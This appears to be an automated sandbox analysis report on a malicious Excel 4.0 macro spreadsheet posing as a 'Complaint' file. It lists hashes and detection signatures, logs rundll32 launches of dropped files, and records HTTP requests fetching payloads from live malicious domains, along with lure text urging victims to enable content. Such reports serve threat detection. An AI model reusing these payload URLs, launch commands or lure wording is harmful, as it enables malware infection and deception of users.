Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-1091191320-02182021.xls

Overview

General Information

Sample Name:Complaint-1091191320-02182021.xls
Analysis ID:356327
MD5:da47abb08bf5ab8ccd6dde8b8395585d
SHA1:f4ffc845ceb85dee839ac85228ff410d9a01bd33
SHA256:91b4e89cdfe2e0d0f29642b21d4035ee4201f99e24e5ec841d4c8bb73547cd78

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5544 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7112 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7152 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4952 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1748 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6436 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-1091191320-02182021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xae34:$e1: Enable Editing
  • 0xae7e:$e1: Enable Editing
  • 0x1590e:$e1: Enable Editing
  • 0x15958:$e1: Enable Editing
  • 0x20405:$e1: Enable Editing
  • 0x2044f:$e1: Enable Editing
  • 0xae9c:$e2: Enable Content
  • 0x15976:$e2: Enable Content
  • 0x2046d:$e2: Enable Content

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5544, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 7112

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://7ruzezendegi.com/samsgtlfwzt/44249957660300900000.datAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted fileShow sources
Source: Complaint-1091191320-02182021.xlsVirustotal: Detection: 8%Perma Link
Source: Complaint-1091191320-02182021.xlsMetadefender: Detection: 13%Perma Link
Source: Complaint-1091191320-02182021.xlsReversingLabs: Detection: 37%

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: dindorf.com.ar
Source: global trafficTCP traffic: 192.168.2.3:49710 -> 181.88.192.136:80
Source: global trafficTCP traffic: 192.168.2.3:49710 -> 181.88.192.136:80
Source: Joe Sandbox ViewIP Address: 185.159.153.72 185.159.153.72
Source: Joe Sandbox ViewIP Address: 181.88.192.136 181.88.192.136
Source: Joe Sandbox ViewIP Address: 112.125.131.128 112.125.131.128
Source: global trafficHTTP traffic detected: GET /ntpnttfypqs/44249957660300900000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dindorf.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /samsgtlfwzt/44249957660300900000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ntpnttfypqs/44249957660300900000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dindorf.com.arConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /samsgtlfwzt/44249957660300900000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 7ruzezendegi.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: dindorf.com.ar
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: suspendedpage[1].htm.0.drString found in binary or memory: http://pars.host
Source: suspendedpage[1].htm.0.drString found in binary or memory: http://suspend.pars.host/css/css.css
Source: suspendedpage[1].htm.0.drString found in binary or memory: http://suspend.pars.host/image/logo.png
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.aadrm.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.cortana.ai
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.office.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.onedrive.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://augloop.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://augloop.office.com/v2
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cdn.entity.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://clients.config.office.net/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://config.edge.skype.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cortana.ai
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cortana.ai/api
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://cr.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dev.cortana.ai
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://devnull.onenote.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://directory.services.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://graph.windows.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://graph.windows.net/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://lifecycle.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://login.windows.local
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://management.azure.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://management.azure.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://messaging.office.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://officeapps.live.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://onedrive.live.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://outlook.office.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://outlook.office365.com/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://powerlift.acompli.net
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://settings.outlook.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://staging.cortana.ai
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://tasks.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://webshell.suite.office.com
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: C35819AA-F89D-426C-9CA4-8F8A37A7597D.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Complaint-1091191320-02182021.xlsInitial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11_ from the yellow bar above ) " 13 @ Once You have Enable Editing, please click
Source: Screenshot number: 4Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,,_ WHY ICANNOT OPEN THIS DOCUMENT? 19
Source: Screenshot number: 8Screenshot OCR: Enable Editing, please che 14_ from the yellow bar above O There was a problem starting ,,\jDFR.h
Source: Screenshot number: 12Screenshot OCR: Enable Editing, please click Enc RunDLL x 14 from the yellow bar above 15 ,0 There was a pro&m
Source: Screenshot number: 16Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CAN
Source: Screenshot number: 16Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Complaint-1091191320-02182021.xlsInitial sample: EXEC
Source: Complaint-1091191320-02182021.xlsOLE indicator, VBA macros: true
Source: Complaint-1091191320-02182021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engineClassification label: mal88.expl.evad.winXLS@11/8@3/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
